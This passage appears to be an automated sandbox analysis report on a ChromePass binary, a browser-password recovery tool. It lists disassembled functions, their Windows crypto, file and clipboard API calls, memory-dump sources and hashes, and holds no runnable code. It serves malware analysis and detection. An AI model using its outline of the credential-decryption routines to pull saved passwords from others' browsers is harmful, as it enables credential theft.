                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcmpmemset
                                        • String ID:
                                        • API String ID: 1065087418-0
                                        • Opcode ID: d5a313fa8d306e788d3c276cadfebc3fbe89a6dba21542b7c5779996bee17c5d
                                        • Instruction ID: 45caf7c4415f3f6eed915e372f33cd5a6d816b95c38a517210f0624132c76d84
                                        • Opcode Fuzzy Hash: d5a313fa8d306e788d3c276cadfebc3fbe89a6dba21542b7c5779996bee17c5d
                                        • Instruction Fuzzy Hash: 7261C5B1900646BBDB30DF64C88066AB7B4BB10304F24497FE504F7AD2D739AD59CB9A
                                        Function 0040F7DE Relevance: 2.6, APIs: 2, Instructions: 147COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: 5a47a92697ceca4bda858669ce9da63cc47876be752c494a90490a2f72832735
                                        • Instruction ID: 3bf3397b8cd2a7021ef727dcbdd47b90010fc7a11b5e82b2e04aa4fde8c7ed5f
                                        • Opcode Fuzzy Hash: 5a47a92697ceca4bda858669ce9da63cc47876be752c494a90490a2f72832735
                                        • Instruction Fuzzy Hash: D141C772604601AFCB30AF25C48166AB7A5FF44314B14893FE459E7F91D738EC498799
                                        Function 0040CE42 Relevance: 2.5, APIs: 2, Instructions: 25sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: CloseHandleSleep
                                        • String ID:
                                        • API String ID: 252777609-0
                                        • Opcode ID: 0b5221217f3981b554959319653820e88273f99e98a163d5125fd54341fc2777
                                        • Instruction ID: da62a678dcbff2ab1d74d28a03ee2a830e5dbcfe626ce62bc62febd1661457e7
                                        • Opcode Fuzzy Hash: 0b5221217f3981b554959319653820e88273f99e98a163d5125fd54341fc2777
                                        • Instruction Fuzzy Hash: 37E0CD37264515DFC6105BB8DCD0A6B7399DF45A74714433AE262D61F0C67498024694
                                        Function 00421E76 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00421EB4
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID:
                                        • API String ID: 3988221542-0
                                        • Opcode ID: 6c20effda86d1a598f4add828d0d3b9d7382dcea4e18e5554278ae06f534a34d
                                        • Instruction ID: 359b2e2d163342241aca88b0ac67ebd774a7a70df911bbc44683ad615efa9f38
                                        • Opcode Fuzzy Hash: 6c20effda86d1a598f4add828d0d3b9d7382dcea4e18e5554278ae06f534a34d
                                        • Instruction Fuzzy Hash: 04E06576704221AFC710AF56EC05A0AB7A4EF94361F11452AFA00D7371D735EC1697D9
                                        Function 0040A649 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 0040A670
                                          • Part of subcall function 0040A556: memset.MSVCRT ref: 0040A575
                                          • Part of subcall function 0040A556: _itow.MSVCRT ref: 0040A58C
                                          • Part of subcall function 0040A556: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 0040A59B
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                        • String ID:
                                        • API String ID: 4232544981-0
                                        • Opcode ID: bde5b1fb04a4586148818dd68edcfab36a2e863996eddb2dfac08345f01640d6
                                        • Instruction ID: 27ca71f2c1e7233bce1156fe8596df3b893e68cfdcfa4093ed79989d194228f7
                                        • Opcode Fuzzy Hash: bde5b1fb04a4586148818dd68edcfab36a2e863996eddb2dfac08345f01640d6
                                        • Instruction Fuzzy Hash: CAE0B632000209BBDF125FA4EC02AA93FA6FF04314F588469F99814561D7339570AF49
                                        Function 0040523F Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,00000000,00000000,00000000,?,?,004022C7,?,?,00000000,?), ref: 00405256
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 23b5f7c83528ad928ec06d102d022fe566d869636e62f19fc76f219fa4e9a4a7
                                        • Instruction ID: b7b9e6b122b481eb87f847673655712b703efdd963cd359c0dc9ae0a21f62820
                                        • Opcode Fuzzy Hash: 23b5f7c83528ad928ec06d102d022fe566d869636e62f19fc76f219fa4e9a4a7
                                        • Instruction Fuzzy Hash: B0D0C93111020DFBDF11CF80DC06FDD7B7DEB04359F508054BA00A50A0D7B59A11AB64
                                        Function 00404857 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00407BBD,?), ref: 00404869
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 545a10bd94faee1630b1e2d93a7b55cc7f1f7f3d361510b6d9ed3cd93f118199
                                        • Instruction ID: c08432c8c2e4d2c41cad88df03bfa215d1807a6230e9f041270460315cbe795b
                                        • Opcode Fuzzy Hash: 545a10bd94faee1630b1e2d93a7b55cc7f1f7f3d361510b6d9ed3cd93f118199
                                        • Instruction Fuzzy Hash: 98C092F0350201BEFE204A50AD4AF3B295DE780700F5084207E00E40E0D6A14C418924
                                        Function 0040A8CF Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • EnumResourceNamesW.KERNELBASE(?,?,Function_0000A849,00000000), ref: 0040A8DE
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: EnumNamesResource
                                        • String ID:
                                        • API String ID: 3334572018-0
                                        • Opcode ID: c325475149a1819e2152a84acc8de6c6d78d86499e34564c9dfda14c2fddf4cc
                                        • Instruction ID: a3e708811810f67fbb64cd1ef38ae1cc2770998dac08dc2ff20638f01517641c
                                        • Opcode Fuzzy Hash: c325475149a1819e2152a84acc8de6c6d78d86499e34564c9dfda14c2fddf4cc
                                        • Instruction Fuzzy Hash: 93C09B32254341A7D7119F208C05F1F7695BF54701F504C39B151940E1C76140359A05
                                        Function 00404B83 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00402F21,?), ref: 00404B87
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 6fcfa2bc77288e031a84447e9f43986890a9b6c137ea0bad3083a33c329ccfdf
                                        • Instruction ID: 4e683cf876b8ba9cae9ebe1f88191206cf5ed4a36af62789711041363749bb20
                                        • Opcode Fuzzy Hash: 6fcfa2bc77288e031a84447e9f43986890a9b6c137ea0bad3083a33c329ccfdf
                                        • Instruction Fuzzy Hash: E4B012753100004BCB380B389C8A05D35506F44631760073CF033C00F0E720CC71BE00
                                        Function 00410B9A Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040B358: memset.MSVCRT ref: 0040B371
                                        • memset.MSVCRT ref: 00410C3D
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: 8e25715243bfc7993adfadd9f40a5f7aea7b024d36f38b061f72207621e1ac3c
                                        • Instruction ID: 71882556d22d5983589a3461620eb5751ea2a34ccc68dee96e2d76b05dfd967f
                                        • Opcode Fuzzy Hash: 8e25715243bfc7993adfadd9f40a5f7aea7b024d36f38b061f72207621e1ac3c
                                        • Instruction Fuzzy Hash: AB516F719043499FDB20DFA9C4909DEBBF0EF19304F24456EE485AB342D379AA84CB99
                                        Function 004055E9 Relevance: 1.4, APIs: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040543B: free.MSVCRT ref: 0040543E
                                          • Part of subcall function 0040543B: free.MSVCRT ref: 00405446
                                        • free.MSVCRT ref: 004056AF
                                          • Part of subcall function 0040551C: free.MSVCRT ref: 0040552B
                                          • Part of subcall function 00404AE7: malloc.MSVCRT ref: 00404B03
                                          • Part of subcall function 00404AE7: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004027D0,00000002,?,?,?,00401DD0,?), ref: 00404B1B
                                          • Part of subcall function 00404AE7: free.MSVCRT ref: 00404B24
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpy
                                        • String ID:
                                        • API String ID: 3401966785-0
                                        • Opcode ID: 34ee092bfd22b0319c63bd0099accc9bcf1e5f13631f25b15267153dddd078c6
                                        • Instruction ID: 664ed08ed06512708bdc7daee16593bf9a063338b09f4670775a3efeeebd1403
                                        • Opcode Fuzzy Hash: 34ee092bfd22b0319c63bd0099accc9bcf1e5f13631f25b15267153dddd078c6
                                        • Instruction Fuzzy Hash: 32512675D006099BCB10EF99C4805AEB7B5FF48314FA0843BE954B7290D739AE46CF99
                                        Function 00405552 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 83d31481d796059539d00f5385bf62676edb643d883e75c26102b29d730e577f
                                        • Instruction ID: 609ed0aab236816ff05067ee66e464794d0dd207a53293c98384bc9347bee541
                                        • Opcode Fuzzy Hash: 83d31481d796059539d00f5385bf62676edb643d883e75c26102b29d730e577f
                                        • Instruction Fuzzy Hash: 22C012B2510B019BE7308E21C805323B2E4AF0072BFA0880D949582080C77CD8808A08

                                        Non-executed Functions

                                        Function 0040315B Relevance: 16.7, APIs: 11, Instructions: 211memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memcmp.MSVCRT(?,00000414,00000005,00000000,00000000,000000FF), ref: 00403198
                                        • memset.MSVCRT ref: 004031B9
                                        • memset.MSVCRT ref: 004031D5
                                          • Part of subcall function 00402D84: memset.MSVCRT ref: 00402DA2
                                          • Part of subcall function 00402D84: _snwprintf.MSVCRT ref: 00402E09
                                          • Part of subcall function 00402D84: wcslen.MSVCRT ref: 00402E56
                                          • Part of subcall function 00402D84: wcslen.MSVCRT ref: 00402E62
                                        • memset.MSVCRT ref: 0040320E
                                        • memset.MSVCRT ref: 0040322A
                                          • Part of subcall function 00404AB9: wcslen.MSVCRT ref: 00404AC0
                                          • Part of subcall function 00404AB9: memcpy.MSVCRT(?,00000143,00000143,00000143,00402E53,-0000040E), ref: 00404AD6
                                          • Part of subcall function 00402C80: wcslen.MSVCRT ref: 00402CA6
                                          • Part of subcall function 00402C80: wcslen.MSVCRT ref: 00402CBD
                                          • Part of subcall function 00402F70: GetFileSize.KERNEL32(00000000,00000000,?,?,00000414), ref: 00402F97
                                          • Part of subcall function 00402F70: memset.MSVCRT ref: 00402FBF
                                          • Part of subcall function 00402F70: CloseHandle.KERNEL32(00000000), ref: 00402FD8
                                          • Part of subcall function 00402F70: memset.MSVCRT ref: 00402FF7
                                          • Part of subcall function 00402F70: memcpy.MSVCRT(?,?,00000010,?,00000000,00000027), ref: 00403009
                                          • Part of subcall function 00402F70: memset.MSVCRT ref: 00403059
                                          • Part of subcall function 00402F70: memset.MSVCRT ref: 0040306D
                                          • Part of subcall function 00402F70: memcpy.MSVCRT(?,?,00000300,?,?,?,?,?,?), ref: 00403099
                                          • Part of subcall function 00402A96: CryptHashData.ADVAPI32(?,00000414,?,00000000,?,?,?,?,00000001,?,00403303,00000000,00000470,?,00000000,?), ref: 00402AC7
                                          • Part of subcall function 00402A96: CryptHashData.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000001,?,00403303,00000000,00000470,?,00000000,?), ref: 00402AD3
                                          • Part of subcall function 00402A96: CryptGetHashParam.ADVAPI32(?,00000002,00000414,00000414,00000000,00008004,?,00403303,00000000,00000470,?,00000000,?,00401AA1,00000000,00000414), ref: 00402AEF
                                        • memcmp.MSVCRT(F4458D15,00000000,00000014,00000000,00000470,?,00000000,?,00401AA1,00000000,00000414,00000000,?,?,00000414,?), ref: 00403311
                                        • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?), ref: 00403322
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000FF), ref: 0040338A
                                          • Part of subcall function 00402AFB: CryptHashData.ADVAPI32(00000000,00000000,?,00000000,00000000,K3@,K3@,00000001,00000000,?,0040334B,00000000,00000450,00000000,?,00000000), ref: 00402B28
                                          • Part of subcall function 00402AFB: CryptDeriveKey.ADVAPI32(00000001,00006603,00000000,00A80004,?,00000000,K3@,K3@,00000001,00000000,?,0040334B,00000000,00000450,00000000,?), ref: 00402B40
                                          • Part of subcall function 00402AFB: CryptDestroyHash.ADVAPI32(00000000,?,0040334B,00000000,00000450,00000000,?,00000000,?,?,?,?,?,?), ref: 00402B4B
                                        • memcpy.MSVCRT(00000000,000003A4,00000000,00000000,00000450,00000000,?,00000000,?,?,?,?,?,?), ref: 00403353
                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,?,00000000,00000450,00000000,?,00000000,?,?,?,?), ref: 00403369
                                        • LocalFree.KERNEL32(00000000,?,00000000,00000450,00000000,?,00000000,?,?,?,?,?,?), ref: 00403384
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$Crypt$Hashwcslen$memcpy$Data$Localmemcmp$AllocCloseDecryptDeriveDestroyErrorFileFreeHandleLastParamSize_snwprintf
                                        • String ID:
                                        • API String ID: 719044479-0
                                        • Opcode ID: e66f274a46e5aa937d266edd5eb17bc76c1f287efc3ee08981d969afb51344e0
                                        • Instruction ID: 3b63ed6c748118c4b19feb06f884a30135074ea0a6f3f385b07fc6008615f059
                                        • Opcode Fuzzy Hash: e66f274a46e5aa937d266edd5eb17bc76c1f287efc3ee08981d969afb51344e0
                                        • Instruction Fuzzy Hash: 7F718072900209AFDB51CF94CC81FDFBBBDAF48304F1441A6E905F7291EB749A498BA5
                                        Function 004049F5 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EmptyClipboard.USER32 ref: 004049FF
                                          • Part of subcall function 0040483E: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00402F89,00000414,?,?,00000414), ref: 00404850
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A1C
                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00404A2D
                                        • GlobalLock.KERNEL32(00000000), ref: 00404A3A
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00404A4D
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00404A5F
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00404A68
                                        • GetLastError.KERNEL32 ref: 00404A70
                                        • CloseHandle.KERNEL32(?), ref: 00404A7C
                                        • GetLastError.KERNEL32 ref: 00404A87
                                        • CloseClipboard.USER32 ref: 00404A90
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        • Opcode ID: f64421cc725b7c1d9fbbd9d31fc9a344247914c1808107a53bda7f5ba89435ae
                                        • Instruction ID: 66c021a7c07038b01ede7e69fa42450e3fc4db5bfc6c0bd181125446004d4c2c
                                        • Opcode Fuzzy Hash: f64421cc725b7c1d9fbbd9d31fc9a344247914c1808107a53bda7f5ba89435ae
                                        • Instruction Fuzzy Hash: 2B111676B40204FBD7205BE0EC8DA6E7B78EF44351F504175F502E21A1DB748956CFA9
                                        Function 0040292A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 55encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004027EF: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00402C8F,?,00403271,00000414,?,?,?,?,?,?,?), ref: 004027FF
                                        • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?,?,?,?,?,?,?,00402A6E,?,00000000,?,?), ref: 0040294C
                                        • CryptHashData.ADVAPI32(00000002,n*@,00000040,00000000,?,?,?,?,?,?,00402A6E,?,00000000,?,?), ref: 00402965
                                        • CryptHashData.ADVAPI32(00000002,00000000,?,00000000,?,?,?,?,?,?,00402A6E,?,00000000,?,?), ref: 00402975
                                        • CryptGetHashParam.ADVAPI32(00000002,00000002,?,00000000,00000000,00008004,?,?,?,?,?,?,00402A6E,?,00000000,?), ref: 00402991
                                        • CryptDestroyHash.ADVAPI32(00000002,?,?,?,?,?,?,00402A6E,?,00000000,?,?), ref: 0040299D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$Data$AcquireContextCreateDestroyParam
                                        • String ID: n*@$n*@
                                        • API String ID: 1860763720-3431974180
                                        • Opcode ID: a1c6cfe388ec5bc95268aecb14832fe34c0417f1b8fbc0751258a7f04bf5e137
                                        • Instruction ID: 7e61502366c1b5d51b3a18da5fbb5d34ba8d65d6071572742d50424c55b83f52
                                        • Opcode Fuzzy Hash: a1c6cfe388ec5bc95268aecb14832fe34c0417f1b8fbc0751258a7f04bf5e137
                                        • Instruction Fuzzy Hash: 9C013CB2600208FFDB119F95DD85D9F7BADEF08394F104075F604A2190DB75CE119B68
                                        Function 00415232 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 280stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmpDownload File
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                        Joe Sandbox IDA Plugin
